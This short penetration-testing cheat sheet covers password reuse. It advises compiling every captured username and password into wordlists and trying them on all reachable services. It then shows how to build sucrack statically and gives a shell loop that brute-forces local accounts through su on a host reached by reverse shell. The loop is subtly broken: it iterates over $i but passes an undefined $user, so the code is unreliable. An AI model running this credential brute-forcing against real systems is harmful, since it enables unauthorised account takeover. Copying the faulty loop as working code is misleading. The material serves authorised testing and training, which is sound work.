# Password Reuse

Whenever you see a user account or a credential, then write it down and compile a users wordlist and a passwords wordlist. You can then try out all these combinations on all services you want access to.

\
Note: **Don**'t use [this](https://github.com/carlospolop/su-bruteforce) script to bruteforce user account passwords, **it sucks**

## Sucrack

On linux, use sucrack. [Link to static binary.](https://github.com/heinosasshallik/infosec-knowledge/tree/master/static_tools)

Building the static binary:

```
# Make sure you have all the libraries you need.
# This is to get rid of the "you don't have the aclocal library" error message
autoreconf -f -i
./configure --enable-static-linking
make
```

Enumerating through a users and passwords list:

```
for i in $(cat ./users.txt); do echo "Cracking $i"; ./sucrack -u "$user" ./passwords.txt ; done
```

**Warning: Running sucrack may break your reverse shell a bit!**